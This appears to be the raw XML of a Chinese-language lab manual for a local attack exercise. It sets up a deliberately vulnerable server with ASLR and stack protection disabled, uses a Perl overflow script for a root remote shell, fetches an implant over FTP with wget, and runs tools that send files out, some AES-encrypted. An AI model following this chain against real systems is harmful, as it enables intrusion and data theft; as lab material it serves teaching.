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10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bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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1. 环境要求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Ubuntu 18.10   64bit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gcc version 8.2.0 (Ubuntu 8.2.0-7ubuntu1)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Python 3.8.2 </w:t>
      </w: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需要关闭地址随机化</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left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 sudo sh -c "echo 0 &gt; /proc/sys/kernel/randomize_va_space"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10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0"/>
        </w:numPr>
        <w:ind w:left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使用本地127.0.0.1的端口模拟局域网</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/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2.  server端程序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（1）myserver   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具有相应功能和漏洞的服务端程序  ，使用127.0.0.1:12345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源代码见 source codes 文件夹myserver.cpp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编译使用的命令 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编译时关闭栈保护 gcc -g myserver.cpp -o myserver -z execstack -fno-stack-protector -lstdc++ -g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074670" cy="1975485"/>
            <wp:effectExtent l="0" t="0" r="381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074670" cy="19754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使用  ./myserver  启动服务</w:t>
      </w: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4503420" cy="868680"/>
            <wp:effectExtent l="0" t="0" r="762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503420" cy="86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启动失败可能是端口占用  lsof -i:12345  kill即可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3.  attacker端程序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（1）initkey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生成两对RSA公私钥的程序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源代码见 source codes 文件夹 initkey.py    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编译方法是 pyinstaller -F initkey.py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848100" cy="2583180"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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5831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 ./initkey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生成: att开头为attacker公私钥，dae开头为daemon程序公私钥。后续获得server端shell后，会上传server端公私钥和attacker端公钥到server端。</w:t>
      </w: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3512820" cy="891540"/>
            <wp:effectExtent l="0" t="0" r="762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51282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（2）normalcli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普通的客户端程序，发送字符串，接受server返回的倒转字符串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输入attack会提示攻击方法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源代码见 source codes 文件夹 normalcli.py  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编译方法是 pyinstaller -F  normalcli.py</w:t>
      </w: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3246120" cy="2110740"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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46120" cy="2110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./normal</w:t>
      </w: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4488815" cy="3762375"/>
            <wp:effectExtent l="0" t="0" r="6985" b="190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488815" cy="3762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3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exploitscan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漏洞扫描程序，扫描具有设计好的漏洞的服务器。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源代码见 source codes 文件夹 exploitscan.py  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编译方法是 pyinstaller -F  exploitscan.py</w:t>
      </w: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2865120" cy="1356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865120" cy="1356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 ./exploitscan  源代码设定扫描范围为 127.0.0.1：  12000-13000.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先扫描得到开放端口，再对开放的端口发送数据 。当溢出时提示用户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152900" cy="777240"/>
            <wp:effectExtent l="0" t="0" r="762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777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2560320" cy="1028700"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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60320" cy="102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2857500" cy="1005840"/>
            <wp:effectExtent l="0" t="0" r="762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1005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攻击12345端口时服务器崩溃，说明该服务器具有设计好的漏洞</w:t>
      </w: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3543300" cy="1318260"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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1318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4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attack.pl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攻击漏洞服务器的perl脚本。思路见设计文档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使用时需要先修改溢出地址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溢出地址获取方法如下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获取溢出地址简单的方法：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由于设计的溢出数组result大小为256字节，加上rbp，rip16字节，256+16=272字节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只需要获取实际运行的result的地址+272即为要覆盖的address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获取溢出地址复杂一点的方法：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使用gdb调试 myserver :   gdb ./myserver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4381500" cy="853440"/>
            <wp:effectExtent l="0" t="0" r="762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853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在strcpy前加断点 b 27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2743200" cy="195072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743200" cy="1950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使用normalcli发送meowdance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3040" cy="744220"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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44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暂停后使用find neowdance查询字符串位置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继续运行，c，打印result地址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1927860" cy="1242060"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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92786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计算可知二者差距 272字节，由于gdb调试和实际地址有偏差，获取实际运行的server的result的地址+272即得到实际的address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为了方便获取实际运行的result地址，在server添加了打印，直接+272即可</w:t>
      </w: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4084320" cy="1013460"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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0x7fffffffdb80+272得到 0x7fffffffdc90 修改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67960" cy="881380"/>
            <wp:effectExtent l="0" t="0" r="5080" b="254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881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使用perl attack.pl获取remote  shell</w:t>
      </w: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4457700" cy="2247900"/>
            <wp:effectExtent l="0" t="0" r="762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57700" cy="2247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使用vi liuqiang.txt 即可创建含有姓名的txt文件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Whoami可知为erio，具有root权限</w:t>
      </w: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4564380" cy="1242060"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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64380" cy="1242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default"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>由上可知获取了root权限，下面的所有演示直接用terminal演示，更方便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（5）daemon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具有搜索，发送文件功能，daemon特性的程序，利用23232端口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源代码见source codes 文件夹 daemon.py  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编译方法是 pyinstaller -F  daemon.py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使用方法：attacker攻击漏洞服务器获取root shell后上传到server端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在attacker安装启动ftp服务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在获取的remoteshell使用wget下载daemon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5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FFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="288" w:afterAutospacing="0" w:line="264" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/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</w:rPr>
      </w:pP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 xml:space="preserve">wget -nH -P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/home/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/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erio/Desktop/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>serverf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/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 xml:space="preserve">/ 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ftp://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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>//home/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>erio/Desktop/attacker/daemon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注意需要修改ftp配置文件允许匿名登录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在获取的shell，sudo ./daemon，即可运行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由于部分文件夹需要系统权限，使用sudo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0500" cy="608330"/>
            <wp:effectExtent l="0" t="0" r="2540" b="127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6083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关闭方法：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sudo netstat -ntulp |grep 23232</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">  扫描程序进程号 sudo kill -9 id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（6）getfile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与上面的daemon对应，socket链接获取daemon扫描到的文件。明文传输，进行md5校验。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源代码见source codes 文件夹 getfile.py  。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编译方法是 pyinstaller -F  getfile.py。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运行：attacker端运行  ./getfile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4003040" cy="2917190"/>
            <wp:effectExtent l="0" t="0" r="5080" b="889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003040" cy="2917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default"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>注意以下7,8,9,10四个程序中设计.pem  与.txt文件的读取，部分采用相对地址，部分由于一些问题使用了绝对地址，根据需要修改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（7）getkey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获取AES加密秘钥的程序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源代码见source codes 文件夹 getkey.py  。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编译方法是 pyinstaller -F  getkey.py。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通过shell上传到server然后运行，等待attacker端sendkey，保存秘钥。保存为 hello.log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运行命令 ./getkey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3787140" cy="571500"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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787140" cy="571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（8）sendkey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发送AES加密秘钥的程序。设计过程见设计文档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源代码见source codes 文件夹 sendkey.py  。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编译方法是 pyinstaller -F sendkey.py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当上传getkey并在server运行后，在attacker端运行 ./sendkey，读取key.txt中的128位秘钥，发送到server</w:t>
      </w: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3962400" cy="1470660"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620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图片 24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470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</w:pP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eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>cryptdaemon.py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功能和daemon相同，使用AES加密传输内容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源代码见source codes 文件夹 cryptdaemon.py  。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由于使用一些库编译有问题，直接使用源代码运行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5272405" cy="1951990"/>
            <wp:effectExtent l="0" t="0" r="635" b="1397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5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1951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上传到serverf运行即可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运行命令 sudo python3 cryptdaemon.py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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="791845"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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图片 26"/>
                    <pic:cNvPicPr>
                      <a:picLocks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791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（10）cryptgetfile</w:t>
      </w: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功能和getfile相同，获取AES加密传输的文件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源代码见source codes 文件夹cryptgetfile.py  。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编译方法是 pyinstaller -F cryptgetfile.py</w:t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pStyle w:val="10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当server端运行cryptdaemon后，Attacker端运行 ./cryptgetfile  即可</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4648200" cy="2506980"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620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图片 27"/>
                    <pic:cNvPicPr>
                      <a:picLocks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48200" cy="25069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10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:num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18C0"/>
    <w:rsid w:val="00047B67"/>
    <w:rsid w:val="00056FA1"/>
    <w:rsid w:val="001107DC"/>
    <w:rsid w:val="00122298"/>
    <w:rsid w:val="001F18C0"/>
    <w:rsid w:val="002E52AB"/>
    <w:rsid w:val="003C3B8D"/>
    <w:rsid w:val="004E7C78"/>
    <w:rsid w:val="00640EAF"/>
    <w:rsid w:val="00642122"/>
    <w:rsid w:val="006A355D"/>
    <w:rsid w:val="006F045E"/>
    <w:rsid w:val="00862498"/>
    <w:rsid w:val="0095007B"/>
    <w:rsid w:val="009C4ED5"/>
    <w:rsid w:val="009F21F7"/>
    <w:rsid w:val="00A773D6"/>
    <w:rsid w:val="00B26D12"/>
    <w:rsid w:val="00B31B9C"/>
    <w:rsid w:val="00B84143"/>
    <w:rsid w:val="00D071FC"/>
    <w:rsid w:val="00E865D9"/>
    <w:rsid w:val="00EB72F9"/>
    <w:rsid w:val="01094A6C"/>
    <w:rsid w:val="04A80BE1"/>
    <w:rsid w:val="128D4D30"/>
    <w:rsid w:val="1FCE0639"/>
    <w:rsid w:val="22DB7D81"/>
    <w:rsid w:val="23011704"/>
    <w:rsid w:val="27423FA0"/>
    <w:rsid w:val="2E1F372F"/>
    <w:rsid w:val="3E2A329E"/>
    <w:rsid w:val="3F514B15"/>
    <w:rsid w:val="48CF0672"/>
    <w:rsid w:val="4A2F3297"/>
    <w:rsid w:val="4CF57F8B"/>
    <w:rsid w:val="4DA37295"/>
    <w:rsid w:val="4EC16F36"/>
    <w:rsid w:val="52AE2FD3"/>
    <w:rsid w:val="54EA6635"/>
    <w:rsid w:val="63797B2C"/>
    <w:rsid w:val="650C0FEB"/>
    <w:rsid w:val="692D27DB"/>
    <w:rsid w:val="69E406B6"/>
    <w:rsid w:val="6FD24C56"/>
    <w:rsid w:val="79AA1637"/>
    <w:rsid w:val="7AD937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qFormat="1"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iPriority="0" w:name="HTML Variable"/>
    <w:lsdException w:uiPriority="99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nhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table Web 3"/>
    <w:lsdException w:uiPriority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after="33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after="260" w:line="413" w:lineRule="auto"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:default="1" w:styleId="7">
    <w:name w:val="Default Paragraph Font"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
  </w:style>
  <w:style w:type="table" w:default="1" w:styleId="6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HTML Preformatted"/>
    <w:basedOn w:val="1"/>
    <w:qFormat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8">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="7"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="9">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="7"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="808080"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="10">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="99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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png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587</Words>
  <Characters>3351</Characters>
  <Lines>27</Lines>
  <Paragraphs>7</Paragraphs>
  <TotalTime>10</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>3931</CharactersWithSpaces>
  <Application>WPS Office_11.1.0.9740_F1E327BC-269C-435d-A152-05C5408002CA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人畜无害</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-06-29T02:10:26Z</dcterms:modified>
  <cp:revision>18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2052-11.1.0.9740</vt:lpwstr>
  </property>
</Properties>
</file>